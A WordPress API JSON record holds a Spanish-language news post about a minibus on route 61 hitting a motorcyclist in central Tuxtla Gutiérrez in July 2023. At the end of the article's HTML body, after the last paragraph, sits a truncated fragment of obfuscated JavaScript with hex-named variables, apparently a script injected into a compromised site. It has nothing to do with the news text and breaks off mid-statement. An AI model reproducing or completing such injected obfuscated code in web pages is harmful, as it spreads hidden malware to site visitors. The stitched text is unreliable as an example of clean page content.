{"id":10931,"date":"2023-07-11T02:39:20","date_gmt":"2023-07-11T02:39:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10931"},"modified":"2023-07-11T02:39:21","modified_gmt":"2023-07-11T02:39:21","slug":"colectivo-impacta-a-motociclista-en-el-centro-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10931","title":{"rendered":"Colectivo impacta a motociclista en el centro de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"862\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689043119999-862x1024.jpg\" alt=\"\" class=\"wp-image-10932\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689043119999-862x1024.jpg 862w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689043119999-253x300.jpg 253w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689043119999-768x912.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689043119999.jpg 1078w\" sizes=\"auto, (max-width: 862px) 100vw, 862px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 10 de julio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un colectivo atropell\u00f3 a un motociclista que circulaba sobre la Avenida Central a la altura de la 2a Poniente, este lunes por la ma\u00f1ana.<\/p>\n\n\n\n<p>Los reportes de tr\u00e1nsito informaron que, el conductor de la moto intent\u00f3 cruzar la Avenida cuando fue impactado por la unidad de transporte p\u00fablico de la ruta 61 marcada con el n\u00famero 21.<\/p>\n\n\n\n<p>Por el golpe, el hombre sali\u00f3 volando por lo que fue auxiliado por los transe\u00fantes<\/p>\n\n\n\n<p>Param\u00e9dicos de la Cruz Roja Mexicana auxiliaron al lesionado y lo trasladaron a un nosocomio para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>Una gr\u00faa arrib\u00f3 para llevarse las dos unidades en una gr\u00faa para ser puestas a disposici\u00f3n del Ministerio p\u00fablico.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 10 de julio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un colectivo atropell\u00f3 a un motociclista que circulaba sobre la Avenida Central a la altura de la 2a Poniente, este lunes por la ma\u00f1ana. Los reportes de tr\u00e1nsito informaron que, el conductor de la moto intent\u00f3 cruzar la Avenida cuando fue impactado por &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10932,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10931","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10931","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10931"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10931\/revisions"}],"predecessor-version":[{"id":10933,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10931\/revisions\/10933"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10932"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10931"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10931"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10931"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}